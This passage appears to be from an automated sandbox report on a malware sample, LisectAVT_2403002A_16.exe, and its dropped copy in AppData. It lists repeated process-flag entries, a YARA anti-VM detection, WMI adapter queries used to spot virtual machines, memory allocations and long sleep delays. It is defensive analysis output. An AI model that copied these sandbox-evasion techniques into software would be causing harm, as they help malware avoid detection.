                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 6668, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7680, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 4E90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 7C00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 14A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 79D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 89D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 79D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: F60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 2A70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8436Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8182Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 505Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWindow / User API: threadDelayed 2784Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWindow / User API: threadDelayed 1041Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWindow / User API: threadDelayed 1143
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWindow / User API: threadDelayed 2365
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 2060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -7378697629483816s >= -30000sJump to behavior
